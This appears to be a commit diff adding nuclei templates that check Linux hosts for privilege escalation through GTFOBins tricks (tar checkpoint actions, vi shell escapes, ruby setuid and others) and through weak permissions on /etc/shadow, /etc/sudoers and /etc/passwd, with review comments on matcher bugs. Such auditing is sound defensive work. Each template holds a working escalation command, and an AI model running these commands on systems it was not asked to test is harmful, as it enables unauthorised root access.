self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
rpm --pipe 'whoami 0<&1'
#SUDO
- engine:
- sh
- bash
source: |
sudo rpm --pipe 'whoami 0<&1'
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or


@ -0,0 +1,46 @@
id: privilege-escalation-rpmdb
info:
name: rpmdb - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/rpmdb/
metadata:
verified: true
tags: code,linux,rpmdb,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
rpmdb --eval '%(whoami 1>&2)'
#SUDO
- engine:
- sh
- bash
source: |
sudo rpmdb --eval '%(whoami 1>&2)'
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or


@ -0,0 +1,46 @@
id: privilege-escalation-rpmverify
info:
name: rpmverify - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/rpmverify/
metadata:
verified: true
tags: code,linux,rpmverify,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
rpmverify --eval '%(whoami 1>&2)'
#SUDO
- engine:
- sh
- bash
source: |
sudo rpmverify --eval '%(whoami 1>&2)'
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or


@ -0,0 +1,54 @@
id: privilege-escalation-ruby
info:
name: Ruby - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/ruby/
metadata:
verified: true
tags: code,linux,ruby,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
ruby -e 'exec "whoami"'
#SUDO
- engine:
- sh
- bash
source: |
sudo ruby -e 'exec "whoami"'
#Capabilities
- engine:
- sh
- bash
source: |
ruby -e 'Process::Sys.setuid(0); exec "whoami"'
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
- 'contains(code_4_response, "root")'
condition: or


@ -0,0 +1,46 @@
id: privilege-escalation-run-parts
info:
name: run-parts - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/run-parts/
metadata:
verified: true
tags: code,linux,run-parts,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
run-parts --new-session --regex 'whoami' /bin
#SUDO
- engine:
- sh
- bash
source: |
sudo run-parts --new-session --regex 'whoami' /bin
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or


@ -0,0 +1,46 @@
id: privilege-escalation-sash
info:
name: sash - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/sash/
metadata:
verified: true
tags: code,linux,sash,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
sash -c 'whoami'
#SUDO
- engine:
- sh
- bash
source: |
sudo sash -c 'whoami'
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or


@ -0,0 +1,46 @@
id: privilege-escalation-slsh
info:
name: slsh - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/slsh/
metadata:
verified: true
tags: code,linux,slsh,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
slsh -e 'system("whoami")'
#SUDO
- engine:
- sh
- bash
source: |
sudo slsh -e 'system("whoami")'
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or


@ -0,0 +1,46 @@
id: privilege-escalation-socat
info:
name: Socat - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/socat/
metadata:
verified: true
tags: code,linux,socat,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
socat stdin exec:whoami
#SUDO
- engine:
- sh
- bash
source: |
sudo socat stdin exec:whoami
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or
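Review bot: The SUID step `socat stdin exec:whoami` sends the exec output back to the `stdin` address (fd 0); when nuclei hands the script a pipe rather than a terminal that descriptor is read-only, so whoami's output may be dropped and the template stays silent even on a SUID socat. `socat - exec:whoami` uses the STDIO address and writes to stdout, which is the safer form for a non-interactive check; worth confirming with a run whose stdin is redirected before relying on the current line.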


@ -0,0 +1,46 @@
id: privilege-escalation-softlimit
info:
name: softlimit - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/softlimit/
metadata:
verified: true
tags: code,linux,softlimit,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
softlimit whoami
#SUDO
- engine:
- sh
- bash
source: |
sudo softlimit whoami
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or


@ -0,0 +1,46 @@
id: privilege-escalation-sqlite3
info:
name: sqlite3 - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/sqlite3/
metadata:
verified: true
tags: code,linux,sqlite3,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
sqlite3 /dev/null '.shell whoami'
#SUDO
- engine:
- sh
- bash
source: |
sudo sqlite3 /dev/null '.shell whoami'
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or


@ -0,0 +1,46 @@
id: privilege-escalation-ssh-agent
info:
name: ssh-agent - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/ssh-agent/
metadata:
verified: true
tags: code,linux,ssh-agent,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
ssh-agent whoami
#SUDO
- engine:
- sh
- bash
source: |
sudo ssh-agent whoami
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or


@ -0,0 +1,46 @@
id: privilege-escalation-sshpass
info:
name: sshpass - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/sshpass/
metadata:
verified: true
tags: code,linux,sshpass,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
sshpass whoami
#SUDO
- engine:
- sh
- bash
source: |
sudo sshpass whoami
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or


@ -0,0 +1,46 @@
id: privilege-escalation-stdbuf
info:
name: stdbuf - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/stdbuf/
metadata:
verified: true
tags: code,linux,stdbuf,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
stdbuf -i0 whoami
#SUDO
- engine:
- sh
- bash
source: |
sudo stdbuf -i0 whoami
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or


@ -0,0 +1,46 @@
id: privilege-escalation-strace
info:
name: strace - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/strace/
metadata:
verified: true
tags: code,linux,strace,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
strace -o /dev/null whoami
#SUDO
- engine:
- sh
- bash
source: |
sudo strace -o /dev/null whoami
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or


@ -0,0 +1,46 @@
id: privilege-escalation-tar
info:
name: tar - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/tar/
metadata:
verified: true
tags: code,linux,tar,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=whoami
#SUDO
- engine:
- sh
- bash
source: |
sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=whoami
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or


@ -0,0 +1,46 @@
id: privilege-escalation-tcsh
info:
name: tcsh - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/tcsh/
metadata:
verified: true
tags: code,linux,tcsh,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
tcsh -c 'whoami'
#SUDO
- engine:
- sh
- bash
source: |
sudo tcsh -c 'whoami'
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or


@ -0,0 +1,46 @@
id: privilege-escalation-time
info:
name: Time - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/time/
metadata:
verified: true
tags: code,linux,time,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
time whoami
#SUDO
- engine:
- sh
- bash
source: |
sudo time whoami
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or
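Review bot: The SUID step `time whoami` does not necessarily run the GTFObins binary: in bash `time` is a reserved word, so the shell times the command itself and `/usr/bin/time` is never executed, and because the engine list includes bash (and `sh` is bash on some distributions) the SUID check can silently test the wrong thing. Force the external program with `command time whoami` or an absolute path, `/usr/bin/time whoami`. The SUDO step is unaffected because sudo resolves the executable itself.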


@ -0,0 +1,46 @@
id: privilege-escalation-timeout
info:
name: Timeout - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/timeout/
metadata:
verified: true
tags: code,linux,timeout,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
timeout 7d whoami
#SUDO
- engine:
- sh
- bash
source: |
sudo timeout 7d whoami
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or


@ -0,0 +1,46 @@
id: privilege-escalation-tmate
info:
name: tmate - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/tmate/
metadata:
verified: true
tags: code,linux,tmate,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
tmate -c whoami
#SUDO
- engine:
- sh
- bash
source: |
sudo tmate -c whoami
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or


@ -0,0 +1,46 @@
id: privilege-escalation-torify
info:
name: Torify - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/torify/
metadata:
verified: true
tags: code,linux,torify,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
torify whoami
#SUDO
- engine:
- sh
- bash
source: |
sudo torify whoami
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or


@ -0,0 +1,46 @@
id: privilege-escalation-torsocks
info:
name: Torsocks - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/torsocks/
metadata:
verified: true
tags: code,linux,torsocks,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
torsocks whoami
#SUDO
- engine:
- sh
- bash
source: |
sudo torsocks whoami
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or


@ -0,0 +1,46 @@
id: privilege-escalation-unshare
info:
name: Unshare - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/unshare/
metadata:
verified: true
tags: code,linux,unshare,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
unshare whoami
#SUDO
- engine:
- sh
- bash
source: |
sudo unshare whoami
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or


@ -0,0 +1,46 @@
id: privilege-escalation-vi
info:
name: Vi - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/vi/
metadata:
verified: true
tags: code,linux,vi,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
vi -c '!whoami'
#SUDO
- engine:
- sh
- bash
source: |
sudo vi -c '!whoami'
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or
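Review bot: The SUID and SUDO steps `vi -c '!whoami'` leave the editor open after the shell command has run; with no tty to answer the hit-enter prompt, vi is likely to sit waiting for input until nuclei's timeout kills it, so the step is slow and its output may never be collected. Append a quit command so the editor exits once whoami has printed, `vi -c '!whoami' -c 'qa!'` (and the same with `sudo`). The view and vim templates later in this commit use the identical pattern and need the same change.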


@ -0,0 +1,46 @@
id: privilege-escalation-view
info:
name: View - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/view/
metadata:
verified: true
tags: code,linux,view,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
view -c ':!whoami'
#SUDO
- engine:
- sh
- bash
source: |
sudo view -c ':!whoami'
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or


@ -0,0 +1,46 @@
id: privilege-escalation-vim
info:
name: Vim - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/vim/
metadata:
verified: true
tags: code,linux,vim,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
vim -c '!whoami'
#SUDO
- engine:
- sh
- bash
source: |
sudo vim -c '!whoami'
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or


@ -0,0 +1,46 @@
id: privilege-escalation-xargs
info:
name: Xargs - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/xargs/
metadata:
verified: true
tags: code,linux,xargs,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
xargs -a /dev/null whoami
#SUDO
- engine:
- sh
- bash
source: |
sudo xargs -a /dev/null whoami
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or


@ -0,0 +1,46 @@
id: privilege-escalation-xdg-user-dir
info:
name: xdg-user-dir - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/xdg-user-dir/
metadata:
verified: true
tags: code,linux,xdg-user-dir,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
xdg-user-dir '}; whoami #'
#SUDO
- engine:
- sh
- bash
source: |
sudo xdg-user-dir '}; whoami #'
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or


@ -0,0 +1,46 @@
id: privilege-escalation-yash
info:
name: Yash - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/yash/
metadata:
verified: true
tags: code,linux,yash,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
yash -c 'whoami'
#SUDO
- engine:
- sh
- bash
source: |
sudo yash -c 'whoami'
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or


@ -0,0 +1,46 @@
id: privilege-escalation-zsh
info:
name: Zsh - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/zsh/
metadata:
verified: true
tags: code,linux,zsh,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
zsh -c 'whoami'
#SUDO
- engine:
- sh
- bash
source: |
sudo zsh -c 'whoami'
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or


@ -0,0 +1,43 @@
id: readable-writable-etc-shadow
info:
name: /etc/shadow writable or readabel - Privilege Escalation
author: daffainfo
severity: high
reference:
- https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-etc-shadow
metadata:
verified: true
tags: code,linux,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
- engine:
- sh
- bash
source: |
[ -r "/etc/shadow" ] || [ -w "/etc/shadow" ] && echo "Either readable or writable" || echo "Not readable and not writable"
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: word
part: code_2_response
words:
- "Either readable or writable"
- type: word
part: code_2_response
words:
- "Not readable and not writable"
negative: true
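Review bot: The three matchers have no `matchers-condition`, and nuclei's default is `or`, so the first matcher alone (negative `root` on code_1_response) satisfies the template for any non-root user and it fires regardless of what the permission check printed. Add `matchers-condition: and` above `matchers:` as every other template in this commit does; readable-writable-etc-sudoers has the same omission, and writable-etc-passwd only avoids a false positive because its `Writable` word match is case-sensitive against `Not writable`. The name field also misspells "readable" as `readabel`.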


@ -0,0 +1,43 @@
id: readable-writable-etc-sudoers
info:
name: /etc/sudoers writable or readable - Privilege Escalation
author: daffainfo
severity: high
reference:
- https://book.hacktricks.xyz/linux-hardening/privilege-escalation#etc-sudoers-etc-sudoers.d
metadata:
verified: true
tags: code,linux,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
- engine:
- sh
- bash
source: |
[ -r "/etc/sudoers" ] || [ -w "/etc/sudoers" ] && echo "Either readable or writable" || echo "Not readable and not writable"
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: word
part: code_2_response
words:
- "Either readable or writable"
- type: word
part: code_2_response
words:
- "Not readable and not writable"
negative: true


@ -0,0 +1,26 @@
id: sudo-nopasswd
info:
name: Sudo NOPASSWD - Privilege Escalation
author: daffainfo
severity: high
description: Sudo configuration might allow a user to execute some command with another user's privileges without knowing the password.
reference:
- https://book.hacktricks.xyz/linux-hardening/privilege-escalation#nopasswd
metadata:
verified: true
tags: code,linux,sudo,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
sudo -l
matchers:
- type: word
part: code_1_response
words:
- "(root) NOPASSWD:"
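Review bot: The word matcher `(root) NOPASSWD:` misses the most common forms `sudo -l` prints, such as `(ALL) NOPASSWD: ALL` or `(ALL : ALL) NOPASSWD: /usr/bin/...`, so those hosts are reported clean. A regex matcher on the tag itself covers every runas spec: `- type: regex` / `part: code_1_response` / `regex: ['NOPASSWD:']`. Since `sudo -l` may itself prompt for the user's password, the step should also be `sudo -n -l` so a password requirement fails fast in the non-interactive run instead of blocking.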


@ -0,0 +1,31 @@
id: writable-etc-passwd
info:
name: /etc/passwd writable - Privilege Escalation
author: daffainfo
severity: high
reference:
- https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-etc-passwd
metadata:
verified: true
tags: code,linux,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
[ -w "/etc/passwd" ] && echo "Writable" || echo "Not writable"
matchers:
- type: word
part: code_1_response
words:
- "Writable"
- type: word
part: code_1_response
words:
- "Not writable"
negative: true